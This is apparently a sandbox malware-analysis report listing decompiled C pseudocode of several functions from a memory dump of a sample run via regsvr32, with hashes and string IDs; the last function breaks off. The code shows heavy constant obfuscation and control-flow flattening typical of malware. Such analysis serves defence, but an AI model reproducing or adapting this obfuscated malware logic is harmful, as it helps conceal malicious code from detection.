                                                                                                                • Instruction Fuzzy Hash: F0023371D0031DDBDF28CFA5D98AADEBBB1FB44314F208199E119BA2A0D7B45A85CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001BA916(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				void* _t293;
                                                                                                                				intOrPtr _t318;
                                                                                                                				void* _t319;
                                                                                                                				intOrPtr _t320;
                                                                                                                				void* _t321;
                                                                                                                				intOrPtr _t330;
                                                                                                                				intOrPtr* _t331;
                                                                                                                				void* _t333;
                                                                                                                				intOrPtr _t356;
                                                                                                                				signed int _t359;
                                                                                                                				signed int _t360;
                                                                                                                				signed int _t361;
                                                                                                                				signed int _t362;
                                                                                                                				signed int _t363;
                                                                                                                				signed int _t364;
                                                                                                                				signed int _t365;
                                                                                                                				void* _t367;
                                                                                                                				void* _t368;
                                                                                                                
                                                                                                                				_t331 = _a8;
                                                                                                                				_t358 = _a16;
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_t331);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t293);
                                                                                                                				_v12 = 0xcfece2;
                                                                                                                				_t356 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_t368 = _t367 + 0x18;
                                                                                                                				_v72 = 0x10390c;
                                                                                                                				_v72 = _v72 + 0xffffc646;
                                                                                                                				_t333 = 0x7113fca;
                                                                                                                				_v72 = _v72 + 0x8901;
                                                                                                                				_v72 = _v72 ^ 0x00108852;
                                                                                                                				_v64 = 0xc2569b;
                                                                                                                				_t359 = 0x3b;
                                                                                                                				_v64 = _v64 * 0x3a;
                                                                                                                				_v64 = _v64 ^ 0x2c079f1f;
                                                                                                                				_v32 = 0x7d2c68;
                                                                                                                				_v32 = _v32 + 0xfffff73c;
                                                                                                                				_v32 = _v32 ^ 0x007d23a4;
                                                                                                                				_v128 = 0x75b64a;
                                                                                                                				_v128 = _v128 / _t359;
                                                                                                                				_v128 = _v128 + 0xffffd052;
                                                                                                                				_v128 = _v128 | 0x8672ae22;
                                                                                                                				_v128 = _v128 ^ 0x8673ef32;
                                                                                                                				_v124 = 0xe9f0ba;
                                                                                                                				_t360 = 0x29;
                                                                                                                				_v124 = _v124 / _t360;
                                                                                                                				_v124 = _v124 >> 0xe;
                                                                                                                				_v124 = _v124 << 7;
                                                                                                                				_v124 = _v124 ^ 0x00000b00;
                                                                                                                				_v92 = 0x799909;
                                                                                                                				_v92 = _v92 >> 8;
                                                                                                                				_v92 = _v92 + 0xffffcd0e;
                                                                                                                				_v92 = _v92 ^ 0x000046a7;
                                                                                                                				_v56 = 0x8ef074;
                                                                                                                				_t361 = 0x71;
                                                                                                                				_v56 = _v56 * 0x47;
                                                                                                                				_v56 = _v56 ^ 0x27a4b02c;
                                                                                                                				_v132 = 0x690018;
                                                                                                                				_v132 = _v132 ^ 0x753d7ebe;
                                                                                                                				_v132 = _v132 + 0xac3c;
                                                                                                                				_v132 = _v132 | 0x0b990209;
                                                                                                                				_v132 = _v132 ^ 0x7fd9c8cb;
                                                                                                                				_v140 = 0x815f08;
                                                                                                                				_v140 = _v140 * 0x73;
                                                                                                                				_v140 = _v140 | 0x676ee4e7;
                                                                                                                				_t76 =  &_v140; // 0x676ee4e7
                                                                                                                				_v140 =  *_t76 / _t361;
                                                                                                                				_v140 = _v140 ^ 0x0127f316;
                                                                                                                				_v144 = 0x3abc98;
                                                                                                                				_v144 = _v144 * 7;
                                                                                                                				_v144 = _v144 >> 0xf;
                                                                                                                				_v144 = _v144 ^ 0xe81b0f65;
                                                                                                                				_v144 = _v144 ^ 0xe812fd25;
                                                                                                                				_v40 = 0x319552;
                                                                                                                				_v40 = _v40 ^ 0x1d2bd854;
                                                                                                                				_v40 = _v40 ^ 0x1d1ded34;
                                                                                                                				_v80 = 0x1d17d1;
                                                                                                                				_v80 = _v80 + 0xa9fa;
                                                                                                                				_v80 = _v80 >> 2;
                                                                                                                				_v80 = _v80 ^ 0x000d60f2;
                                                                                                                				_v104 = 0x8ceca1;
                                                                                                                				_v104 = _v104 << 0xd;
                                                                                                                				_v104 = _v104 + 0xffff778a;
                                                                                                                				_v104 = _v104 ^ 0x9d9973a6;
                                                                                                                				_v96 = 0xea692c;
                                                                                                                				_v96 = _v96 >> 0xf;
                                                                                                                				_v96 = _v96 ^ 0x3587ac27;
                                                                                                                				_v96 = _v96 ^ 0x358266e1;
                                                                                                                				_v100 = 0xb26a44;
                                                                                                                				_t362 = 0x2e;
                                                                                                                				_v100 = _v100 * 0x6d;
                                                                                                                				_v100 = _v100 + 0xffff1c29;
                                                                                                                				_v100 = _v100 ^ 0x4bfa4831;
                                                                                                                				_v48 = 0x656f5f;
                                                                                                                				_v48 = _v48 | 0xa8d50bb0;
                                                                                                                				_v48 = _v48 ^ 0xa8fe92b3;
                                                                                                                				_v68 = 0x9c7f61;
                                                                                                                				_v68 = _v68 ^ 0xb53d5df8;
                                                                                                                				_v68 = _v68 ^ 0xb5a47821;
                                                                                                                				_v60 = 0xbc56d0;
                                                                                                                				_v60 = _v60 ^ 0x99871768;
                                                                                                                				_v60 = _v60 ^ 0x993c193b;
                                                                                                                				_v36 = 0xb45a01;
                                                                                                                				_v36 = _v36 ^ 0x32323901;
                                                                                                                				_v36 = _v36 ^ 0x32877053;
                                                                                                                				_v88 = 0x4d9d62;
                                                                                                                				_v88 = _v88 * 0x30;
                                                                                                                				_v88 = _v88 << 2;
                                                                                                                				_v88 = _v88 ^ 0x3a3f1567;
                                                                                                                				_v76 = 0x6bfb6a;
                                                                                                                				_v76 = _v76 | 0x9d3e0e52;
                                                                                                                				_v76 = _v76 / _t362;
                                                                                                                				_v76 = _v76 ^ 0x03682a61;
                                                                                                                				_v120 = 0x4854b3;
                                                                                                                				_v120 = _v120 >> 8;
                                                                                                                				_v120 = _v120 + 0xc569;
                                                                                                                				_t363 = 0x41;
                                                                                                                				_v120 = _v120 / _t363;
                                                                                                                				_v120 = _v120 ^ 0x00002370;
                                                                                                                				_v28 = 0x7b8e3c;
                                                                                                                				_t364 = 0x78;
                                                                                                                				_v28 = _v28 * 0x72;
                                                                                                                				_v28 = _v28 ^ 0x37042199;
                                                                                                                				_v136 = 0xc7178a;
                                                                                                                				_v136 = _v136 / _t364;
                                                                                                                				_v136 = _v136 << 8;
                                                                                                                				_v136 = _v136 * 0x78;
                                                                                                                				_v136 = _v136 ^ 0xc7162ffc;
                                                                                                                				_v44 = 0x7b610d;
                                                                                                                				_v44 = _v44 | 0xe606a1a1;
                                                                                                                				_v44 = _v44 ^ 0xe67b2d1a;
                                                                                                                				_v24 = 0xb2222a;
                                                                                                                				_v24 = _v24 >> 7;
                                                                                                                				_v24 = _v24 ^ 0x000c957f;
                                                                                                                				_v84 = 0xc3cee5;
                                                                                                                				_v84 = _v84 >> 8;
                                                                                                                				_v84 = _v84 + 0xffff729c;
                                                                                                                				_v84 = _v84 ^ 0x00073a08;
                                                                                                                				_v112 = 0x2abb2b;
                                                                                                                				_v112 = _v112 | 0x3033108e;
                                                                                                                				_v112 = _v112 + 0x9aa;
                                                                                                                				_v112 = _v112 | 0xa5c8e182;
                                                                                                                				_v112 = _v112 ^ 0xb5f899f7;
                                                                                                                				_v52 = 0x758575;
                                                                                                                				_v52 = _v52 | 0x0f0ee750;
                                                                                                                				_v52 = _v52 ^ 0x0f7fc0bd;
                                                                                                                				_v108 = 0x73f24e;
                                                                                                                				_t365 = 0xf;
                                                                                                                				_v108 = _v108 / _t365;
                                                                                                                				_v108 = _v108 >> 3;
                                                                                                                				_v108 = _v108 << 5;
                                                                                                                				_v108 = _v108 ^ 0x001f5b01;
                                                                                                                				_v116 = 0x1d991;
                                                                                                                				_v116 = _v116 * 7;
                                                                                                                				_v116 = _v116 | 0xa3120732;
                                                                                                                				_v116 = _v116 + 0x80de;
                                                                                                                				_v116 = _v116 ^ 0xa31438b7;
                                                                                                                				do {
                                                                                                                					while(_t333 != 0x62e8839) {
                                                                                                                						if(_t333 == 0x6bc9356) {
                                                                                                                							_t320 =  *0x1c4208; // 0x0
                                                                                                                							_t321 = E001C0908( &_v16, _v76,  *((intOrPtr*)(_t320 + 0x1c)),  *((intOrPtr*)(_t358 + 4)), _v20, _v120, _v64, _t333, _t333, _v92,  *_t358, _v28, _v136, _v44, _v24, _v16, _v84, _v112, _v52);
                                                                                                                							_t368 = _t368 + 0x44;
                                                                                                                							if(_t321 == _v56) {
                                                                                                                								 *_t331 = _v20;
                                                                                                                								_t356 = 1;
                                                                                                                								 *((intOrPtr*)(_t331 + 4)) = _v16;
                                                                                                                							} else {
                                                                                                                								_t333 = 0xda644ac;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t333 == 0x7113fca) {
                                                                                                                								_t333 = 0x62e8839;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t333 == 0xda644ac) {
                                                                                                                									E001B17D2(_v108, _v116, _v20);
                                                                                                                								} else {
                                                                                                                									if(_t333 != 0xdadef34) {
                                                                                                                										goto L14;
                                                                                                                									} else {
                                                                                                                										_push(_t333);
                                                                                                                										_t330 = E001A303A(_t333, _v16);
                                                                                                                										_t368 = _t368 + 0xc;
                                                                                                                										_v20 = _t330;
                                                                                                                										if(_t330 != 0) {
                                                                                                                											_t333 = 0x6bc9356;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						return _t356;
                                                                                                                					}
                                                                                                                					_t318 =  *0x1c4208; // 0x0
                                                                                                                					_t319 = E001C0908( &_v16, _v132,  *((intOrPtr*)(_t318 + 0x1c)),  *((intOrPtr*)(_t358 + 4)), _t356, _v140, _v72, _t333, _t333, _v32,  *_t358, _v144, _v40, _v80, _v104, _v128, _v96, _v100, _v48);
                                                                                                                					_t368 = _t368 + 0x44;
                                                                                                                					if(_t319 != _v124) {
                                                                                                                						_t333 = 0x4a84943;
                                                                                                                						goto L14;
                                                                                                                					} else {
                                                                                                                						_t333 = 0xdadef34;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L18;
                                                                                                                					L14:
                                                                                                                				} while (_t333 != 0x4a84943);
                                                                                                                				goto L18;
                                                                                                                			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: a{$,i$h,}$p#$ng
                                                                                                                • API String ID: 0-4078567710
                                                                                                                • Opcode ID: 7a6890e93eae165da216647651a540239732827477bf3d10348f991179bc8597
                                                                                                                • Instruction ID: ac82e524b1f032b8f2d1fe19f67bb276c1fd77c6b8498db4d4c325f9594d4984
                                                                                                                • Opcode Fuzzy Hash: 7a6890e93eae165da216647651a540239732827477bf3d10348f991179bc8597
                                                                                                                • Instruction Fuzzy Hash: 7FE1FFB1508380AFD7A8CF65C58AA4BFBE1FB84748F50891DF6D986220C7B58949DF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001BE5ED() {
                                                                                                                				signed char _t258;
                                                                                                                				intOrPtr _t260;
                                                                                                                				signed int _t265;
                                                                                                                				intOrPtr _t266;
                                                                                                                				signed char _t273;
                                                                                                                				signed short* _t284;
                                                                                                                				signed short* _t285;
                                                                                                                				intOrPtr _t295;
                                                                                                                				signed short* _t297;
                                                                                                                				signed int _t300;
                                                                                                                				signed int _t301;
                                                                                                                				signed int _t302;
                                                                                                                				signed short* _t306;
                                                                                                                				void* _t308;
                                                                                                                
                                                                                                                				 *(_t308 + 0x18) = 0xdc83c4;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) + 0x90ce;
                                                                                                                				_t265 = 0xb48f8c6;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) + 0xdd0e;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) >> 7;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0x00015f2c;
                                                                                                                				 *(_t308 + 0x5c) = 0x78e7a4;
                                                                                                                				 *(_t308 + 0x5c) =  *(_t308 + 0x5c) + 0xedcb;
                                                                                                                				 *(_t308 + 0x5c) =  *(_t308 + 0x5c) ^ 0x007003d5;
                                                                                                                				 *(_t308 + 0x34) = 0xd4e3a0;
                                                                                                                				 *(_t308 + 0x44) =  *(_t308 + 0x34) * 0x42;
                                                                                                                				 *(_t308 + 0x44) =  *(_t308 + 0x44) << 0xd;
                                                                                                                				 *(_t308 + 0x44) =  *(_t308 + 0x44) ^ 0x55e5d6ae;
                                                                                                                				 *(_t308 + 0x70) = 0x805138;
                                                                                                                				_t300 = 0x60;
                                                                                                                				 *(_t308 + 0x70) =  *(_t308 + 0x70) / _t300;
                                                                                                                				 *(_t308 + 0x70) =  *(_t308 + 0x70) ^ 0x00016b36;
                                                                                                                				 *(_t308 + 0x4c) = 0xa4a6d6;
                                                                                                                				 *(_t308 + 0x4c) =  *(_t308 + 0x4c) << 0xd;
                                                                                                                				 *(_t308 + 0x4c) =  *(_t308 + 0x4c) * 0x6a;
                                                                                                                				 *(_t308 + 0x4c) =  *(_t308 + 0x4c) ^ 0xa29b5ad6;
                                                                                                                				 *(_t308 + 0x2c) = 0x6044cb;
                                                                                                                				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) << 0xe;
                                                                                                                				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) + 0x2e14;
                                                                                                                				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) * 0x4f;
                                                                                                                				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) ^ 0x4eb7f0fd;
                                                                                                                				 *(_t308 + 0x48) = 0x727fa8;
                                                                                                                				 *(_t308 + 0x48) =  *(_t308 + 0x48) ^ 0x051af560;
                                                                                                                				 *(_t308 + 0x48) =  *(_t308 + 0x48) ^ 0x6b2866a6;
                                                                                                                				 *(_t308 + 0x48) =  *(_t308 + 0x48) ^ 0x6e468952;
                                                                                                                				 *(_t308 + 0x38) = 0xd8f9a2;
                                                                                                                				 *(_t308 + 0x38) =  *(_t308 + 0x38) << 3;
                                                                                                                				 *(_t308 + 0x38) =  *(_t308 + 0x38) + 0xe988;
                                                                                                                				 *(_t308 + 0x38) =  *(_t308 + 0x38) ^ 0x06c2d08c;
                                                                                                                				 *(_t308 + 0x14) = 0xcfc368;
                                                                                                                				 *(_t308 + 0x14) =  *(_t308 + 0x14) >> 0xa;
                                                                                                                				 *(_t308 + 0x14) =  *(_t308 + 0x14) + 0xffff3c6c;
                                                                                                                				 *(_t308 + 0x14) =  *(_t308 + 0x14) << 0xd;
                                                                                                                				 *(_t308 + 0x14) =  *(_t308 + 0x14) ^ 0xee0b5dfd;
                                                                                                                				 *(_t308 + 0x34) = 0x63262e;
                                                                                                                				 *(_t308 + 0x34) =  *(_t308 + 0x34) ^ 0x3e4153dc;
                                                                                                                				 *(_t308 + 0x34) =  *(_t308 + 0x34) << 6;
                                                                                                                				 *(_t308 + 0x34) =  *(_t308 + 0x34) ^ 0x8890e95c;
                                                                                                                				 *(_t308 + 0x30) = 0x449e40;
                                                                                                                				 *(_t308 + 0x30) =  *(_t308 + 0x30) * 0x64;
                                                                                                                				 *(_t308 + 0x30) =  *(_t308 + 0x30) | 0x4bcc7f17;
                                                                                                                				 *(_t308 + 0x30) =  *(_t308 + 0x30) ^ 0x5bce8c06;
                                                                                                                				 *(_t308 + 0x64) = 0xa8b36a;
                                                                                                                				 *(_t308 + 0x64) =  *(_t308 + 0x64) + 0xffff43b1;
                                                                                                                				 *(_t308 + 0x64) =  *(_t308 + 0x64) ^ 0x00a36b06;
                                                                                                                				 *(_t308 + 0x1c) = 0xf671cb;
                                                                                                                				 *(_t308 + 0x1c) =  *(_t308 + 0x1c) | 0x7dbded57;
                                                                                                                				 *(_t308 + 0x1c) =  *(_t308 + 0x1c) ^ 0xdb2980f7;
                                                                                                                				 *(_t308 + 0x1c) =  *(_t308 + 0x1c) ^ 0xa6d39f78;
                                                                                                                				 *(_t308 + 0x18) = 0x62dc7;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0xc7761c64;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) + 0xbb1;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0xb300d7e4;
                                                                                                                				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0x747182db;
                                                                                                                				 *(_t308 + 0x3c) = 0x296871;
                                                                                                                				 *(_t308 + 0x3c) =  *(_t308 + 0x3c) * 0x72;
                                                                                                                				 *(_t308 + 0x3c) =  *(_t308 + 0x3c) ^ 0x0a3d0d86;
                                                                                                                				 *(_t308 + 0x3c) =  *(_t308 + 0x3c) ^ 0x184f99ee;
                                                                                                                				 *(_t308 + 0x60) = 0xf38101;
                                                                                                                				 *(_t308 + 0x60) =  *(_t308 + 0x60) ^ 0xf99bc674;
                                                                                                                				 *(_t308 + 0x60) =  *(_t308 + 0x60) ^ 0xf9644c13;
                                                                                                                				 *(_t308 + 0x24) = 0xe0439f;
                                                                                                                				 *(_t308 + 0x24) =  *(_t308 + 0x24) + 0x9280;
                                                                                                                				 *(_t308 + 0x24) =  *(_t308 + 0x24) | 0x3fb3a08c;
                                                                                                                				 *(_t308 + 0x24) =  *(_t308 + 0x24) >> 0xa;
                                                                                                                				 *(_t308 + 0x24) =  *(_t308 + 0x24) ^ 0x00012914;
                                                                                                                				 *(_t308 + 0x40) = 0x8399ff;
                                                                                                                				 *(_t308 + 0x40) =  *(_t308 + 0x40) >> 7;
                                                                                                                				 *(_t308 + 0x40) =  *(_t308 + 0x40) + 0xffffcbe1;
                                                                                                                				 *(_t308 + 0x40) =  *(_t308 + 0x40) ^ 0x000a160d;
                                                                                                                				 *(_t308 + 0x68) = 0xbbfe11;
                                                                                                                				_t301 = 0x2a;
                                                                                                                				 *(_t308 + 0x6c) =  *(_t308 + 0x68) / _t301;
                                                                                                                				 *(_t308 + 0x6c) =  *(_t308 + 0x6c) ^ 0x000df844;
                                                                                                                				 *(_t308 + 0x24) = 0x908d3;
                                                                                                                				 *(_t308 + 0x24) =  *(_t308 + 0x24) << 9;
                                                                                                                				 *(_t308 + 0x24) =  *(_t308 + 0x24) + 0xd70e;
                                                                                                                				_t302 = 0x62;
                                                                                                                				_t297 =  *(_t308 + 0x78);
                                                                                                                				_t306 =  *(_t308 + 0x78);
                                                                                                                				 *(_t308 + 0x20) =  *(_t308 + 0x24) * 0x78;
                                                                                                                				 *(_t308 + 0x20) =  *(_t308 + 0x20) ^ 0x78a1165a;
                                                                                                                				 *(_t308 + 0x54) = 0x6343e4;
                                                                                                                				_t154 = _t308 + 0x54; // 0x6343e4
                                                                                                                				 *(_t308 + 0x54) =  *_t154 / _t302;
                                                                                                                				 *(_t308 + 0x54) =  *(_t308 + 0x54) << 0xd;
                                                                                                                				 *(_t308 + 0x54) =  *(_t308 + 0x54) ^ 0x206f08ea;
                                                                                                                				 *(_t308 + 0x50) = 0x7db93c;
                                                                                                                				 *(_t308 + 0x50) =  *(_t308 + 0x50) * 0x39;
                                                                                                                				 *(_t308 + 0x50) =  *(_t308 + 0x50) + 0xb497;
                                                                                                                				 *(_t308 + 0x50) =  *(_t308 + 0x50) ^ 0x1bfe6ae2;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					while(1) {
                                                                                                                						L2:
                                                                                                                						L3:
                                                                                                                						while(_t265 != 0x6032e4a) {
                                                                                                                							if(_t265 == 0x6ffc856) {
                                                                                                                								E001B17D2( *(_t308 + 0x58),  *(_t308 + 0x50),  *(_t308 + 0x78));
                                                                                                                							} else {
                                                                                                                								if(_t265 == 0x899f5fe) {
                                                                                                                									_t284 = E001B8EF8( *(_t308 + 0x34), _t308 + 0x7c, __eflags,  *((intOrPtr*)(_t308 + 0x74)),  *(_t308 + 0x48), 0x1c4000);
                                                                                                                									_t308 = _t308 + 0xc;
                                                                                                                									_t297 = _t284;
                                                                                                                									 *(_t308 + 0x78) = _t284;
                                                                                                                									_t285 =  *(_t308 + 0x58);
                                                                                                                									_t265 = 0x6032e4a;
                                                                                                                									 *(_t308 + 0x5c) =  *((intOrPtr*)(_t308 + 0x74)) + _t284;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t265 == 0xa25387a) {
                                                                                                                										_push( *(_t308 + 0x30));
                                                                                                                										_push(0x1a1730);
                                                                                                                										_push( *(_t308 + 0x3c));
                                                                                                                										 *((char*)(_t308 + 0x1e)) =  *_t297;
                                                                                                                										 *((char*)(_t308 + 0x1f)) = _t297[1];
                                                                                                                										E001C224C( *((intOrPtr*)(_t308 + 0x90)), __eflags,  *(_t308 + 0x43) & 0x000000ff,  *(_t308 + 0x3a) & 0x000000ff,  *(_t308 + 0x44),  *(_t308 + 0x3c), _t297[1] & 0x000000ff, E001BF5D9( *(_t308 + 0x44),  *(_t308 + 0x20), __eflags), 0x10,  *(_t308 + 0x50),  *(_t308 + 0x70), _t297[1] & 0x000000ff);
                                                                                                                										E001BF94B(_t250,  *(_t308 + 0x64),  *((intOrPtr*)(_t308 + 0x7c)),  *((intOrPtr*)(_t308 + 0xa0)),  *(_t308 + 0x54));
                                                                                                                										_t308 = _t308 + 0x40;
                                                                                                                										 *_t306 = (_t297[2] & 0x000000ff) << 0x00000008 | _t297[2] & 0x000000ff;
                                                                                                                										_t258 = _t297[3];
                                                                                                                										_t273 = _t297[3];
                                                                                                                										_t297 =  &(_t297[4]);
                                                                                                                										_t265 = 0xe2ad20d;
                                                                                                                										_t306[0x1c] = (_t258 & 0x000000ff) << 0x00000008 | _t273 & 0x000000ff;
                                                                                                                										while(1) {
                                                                                                                											L1:
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										if(_t265 == 0xb48f8c6) {
                                                                                                                											_t295 =  *0x1c4218; // 0x0
                                                                                                                											_t265 = 0x899f5fe;
                                                                                                                											_t285 = _t295 + 0x20;
                                                                                                                											 *(_t308 + 0x58) = _t285;
                                                                                                                											goto L2;
                                                                                                                										} else {
                                                                                                                											if(_t265 == 0xe2ad20d) {
                                                                                                                												_t260 =  *0x1c4218; // 0x0
                                                                                                                												_t265 = 0xe7921c0;
                                                                                                                												 *_t285 = _t306;
                                                                                                                												_t173 =  &(_t306[0x1e]); // 0x3c
                                                                                                                												_t285 = _t173;
                                                                                                                												 *(_t308 + 0x58) = _t285;
                                                                                                                												 *((intOrPtr*)(_t260 + 4)) =  *((intOrPtr*)(_t260 + 4)) + 1;
                                                                                                                												L2:
                                                                                                                												continue;
                                                                                                                											} else {
                                                                                                                												if(_t265 != 0xe7921c0) {
                                                                                                                													L18:
                                                                                                                													__eflags = _t265 - 0xe7c61bb;
                                                                                                                													if(__eflags != 0) {
                                                                                                                														while(1) {
                                                                                                                															L1:
                                                                                                                															while(1) {
                                                                                                                																L2:
                                                                                                                																goto L3;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													asm("sbb ecx, ecx");
                                                                                                                													_t265 = (_t265 & 0xff0365f4) + 0x6ffc856;
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L21:
                                                                                                                							_t266 =  *0x1c4218; // 0x0
                                                                                                                							 *(_t266 + 8) =  *(_t266 + 8) & 0x00000000;
                                                                                                                							 *((intOrPtr*)(_t266 + 0x1c)) =  *((intOrPtr*)(_t266 + 0x20));
                                                                                                                							__eflags = 1;
                                                                                                                							return 1;
                                                                                                                						}
                                                                                                                						_push(_t265);
                                                                                                                						_t306 = E001A303A(_t265, 0x50);
                                                                                                                						_t308 = _t308 + 0xc;
                                                                                                                						__eflags = _t306;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t265 = 0xe7c61bb;
                                                                                                                							goto L18;
                                                                                                                						} else {
                                                                                                                							_t265 = 0xa25387a;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .&c$qh)$z8%$z8%$Cc
                                                                                                                • API String ID: 0-2743671612
                                                                                                                • Opcode ID: 812566433eab5cc514304cd2885167e5ecdf346cc285e1695f6278dfb2e82faf
                                                                                                                • Instruction ID: 76e3b5c2e920646f95bd4aea24ad2e8057ed6c6da9c209b424b494113ea7f775
                                                                                                                • Opcode Fuzzy Hash: 812566433eab5cc514304cd2885167e5ecdf346cc285e1695f6278dfb2e82faf
                                                                                                                • Instruction Fuzzy Hash: 4BC12F710083819FC358CF65C48A59BFBE1FBD5748F208A1DF6A286260D3B5DA59CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001AC4E5() {
                                                                                                                				signed int _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				void* _t265;
                                                                                                                				void* _t273;
                                                                                                                				signed int _t274;
                                                                                                                				intOrPtr _t275;
                                                                                                                				intOrPtr* _t276;
                                                                                                                				signed int _t277;
                                                                                                                				signed int _t278;
                                                                                                                				signed int _t279;
                                                                                                                				signed int _t280;
                                                                                                                				signed int _t281;
                                                                                                                				signed int _t282;
                                                                                                                				signed int _t283;
                                                                                                                				signed int _t284;
                                                                                                                				void* _t285;
                                                                                                                				void* _t315;
                                                                                                                				signed int* _t319;
                                                                                                                
                                                                                                                				_t319 =  &_v120;
                                                                                                                				_v12 = 0x8031c0;
                                                                                                                				_v4 = 0;
                                                                                                                				_v8 = 0xae329c;
                                                                                                                				_v68 = 0xef757d;
                                                                                                                				_v16 = 0;
                                                                                                                				_t315 = 0x8b00593;
                                                                                                                				_t277 = 0x23;
                                                                                                                				_v68 = _v68 / _t277;
                                                                                                                				_t278 = 0x3f;
                                                                                                                				_v68 = _v68 / _t278;
                                                                                                                				_v68 = _v68 ^ 0x80001bcc;
                                                                                                                				_v112 = 0x89c0de;
                                                                                                                				_v112 = _v112 ^ 0xd31acc07;
                                                                                                                				_v112 = _v112 | 0xdb55a7c5;
                                                                                                                				_v112 = _v112 + 0x9a99;
                                                                                                                				_v112 = _v112 ^ 0xdbd84a74;
                                                                                                                				_v116 = 0xa850fa;
